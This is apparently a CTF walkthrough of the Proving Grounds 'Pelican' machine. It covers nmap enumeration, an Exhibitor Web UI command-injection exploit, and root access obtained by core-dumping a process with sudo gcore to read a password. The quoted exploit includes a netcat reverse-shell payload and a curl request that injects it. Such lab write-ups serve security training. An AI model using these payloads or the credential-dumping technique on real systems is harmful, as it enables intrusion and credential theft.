Logo
Overview

PG: Pelican | Walkthrough

August 24, 2021
3 min read
PG/Machines Boot2Root OSCP/Prep CVE/Exhibitor writeups

Enumeration

Network scan with Nmap

Terminal window
$ nmap $ip -p22,139,445,631,2181,8080,40837 -sVC
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-24 11:38 +0545
Nmap scan report for 192.168.66.98
Host is up (0.49s latency).


PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)
|   256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)
|_  256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
631/tcp   open  ipp         CUPS 2.2
|_http-title: Forbidden - CUPS v2.2.10
| http-methods:
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/2.2 IPP/2.1
2181/tcp  open  zookeeper   Zookeeper 3.4.6-1569965 (Built on 02/20/2014)
8080/tcp  open  http        Jetty 1.0
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(1.0)
8081/tcp open  http    nginx 1.14.2
|_http-title: Did not follow redirect to http://192.168.66.98:8080/exhibitor/v1/ui/index.html
|_http-server-header: nginx/1.14.2
40837/tcp open  java-rmi    Java RMI
Service Info: Host: PELICAN; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Visit port 8081 , redirected to http://192.168.66.98:8080/exhibitor/v1/ui/index.html

Search for known exploit of exhibitor

Terminal window
$ searchsploit exhibitor


Exhibitor Web UI 1.7.1 - Remote Code Execution    | java/webapps/48654.txt


<snip>
The steps to exploit it from a web browser:


    Open the Exhibitor Web UI and click on the Config tab, then flip the Editing switch to ON


    In the “java.env script” field, enter any command surrounded by $() or ``, for example, for a simple reverse shell:


    $(/bin/nc -e /bin/sh 10.0.0.64 4444 &)
    Click Commit > All At Once > OK
    The command may take up to a minute to execute.


It can also be performed with a single curl command:


command: curl -X POST -d @data.json http://10.0.0.200:8080/exhibitor/v1/config/set


data.json: { “zookeeperInstallDirectory”: “/opt/zookeeper”, “zookeeperDataDirectory”: “/opt/zookeeper/snapshots”, “zookeeperLogDirectory”: “/opt/zookeeper/transactions”, “logIndexDirectory”: “/opt/zookeeper/transactions”, “autoManageInstancesSettlingPeriodMs”: “0”, “autoManageInstancesFixedEnsembleSize”: “0”, “autoManageInstancesApplyAllAtOnce”: “1”, “observerThreshold”: “0”, “serversSpec”: “1:exhibitor-demo”, “javaEnvironment”: $(/bin/nc -e /bin/sh 10.0.0.64 4444 &)”, “log4jProperties”: “”, “clientPort”: “2181”, “connectPort”: “2888”, “electionPort”: “3888”, “checkMs”: “30000”, “cleanupPeriodMs”: “300000”, “cleanupMaxFiles”: “20”, “backupPeriodMs”: “600000”, “backupMaxStoreMs”: “21600000”, “autoManageInstances”: “1”, “zooCfgExtra”: { “tickTime”: “2000”, “initLimit”: “10”, “syncLimit”: “5”, “quorumListenOnAllIPs”: true }, “backupExtra”: { “directory”: “” }, “serverId”: 1 }
Mitigation
<snip>

Privilege Escalation

Terminal window
charles@pelican:~$ sudo -l
Matching Defaults entries for charles on pelican:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User charles may run the following commands on pelican:
    (ALL) NOPASSWD: /usr/bin/gcore

Search for services running as root

Terminal window
charles@pelican:~$ ps -aux | grep '^root'
<snip>
root       471  0.0  0.1   9468  2480 ?        S    00:36   0:00 /usr/sbin/CRON -f
root       479  0.0  0.0   2388  1568 ?        Ss   00:36   0:00 /bin/sh -c while true; do chown -R charles:charles /opt/zookeeper && chown -R charles:charles /opt/exhib
itor && sleep 1; done
root       495  0.0  0.0   2276    72 ?        Ss   00:36   0:00 /usr/bin/password-store
root       498  0.0  0.4 235840  8824 ?        Ssl  00:36   0:00 /usr/lib/policykit-1/polkitd --no-debug
root       555  0.0  0.3 313364  6920 ?        Ssl  00:36   0:00 /usr/sbin/lightdm
root       583  0.0  0.3  15852  7112 ?        Ss   00:36   0:00 /usr/sbin/sshd -D
<snip>

Generate core dump of /usr/bin/password-store whose pid is 495.

Terminal window
charles@pelican:~$ sudo /usr/bin/gcore 495
0x00007f50a9fce6f4 in __GI___nanosleep (requested_time=requested_time@entry=0x7ffccf6689b0, remaining=remaining@entry=0x7ffccf6689b0) at ../sysdeps/unix/sysv/linux/nanos
leep.c:28
28      ../sysdeps/unix/sysv/linux/nanosleep.c: No such file or directory.
Saved corefile core.495
[Inferior 1 (process 495) detached]
charles@pelican:~$ ls
core.495  local.txt

Using strings on core dumped file to get readable lines.

Terminal window
charles@pelican:~$ strings core.495
<snip>
001 Password: root:
ClogKingpinInning731
x86_64
/usr/bin/password-store
HOME=/root
LOGNAME=root
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
<snip>

Change user to root

Terminal window
charles@pelican:~$ su root
Password: ClogKingpinInning731
root@pelican:/home/charles# whoami
root
root@pelican:/home/charles# cd
root@pelican:~# cat proof.txt
ff68887c70d3c00594b53fb4d36e7c23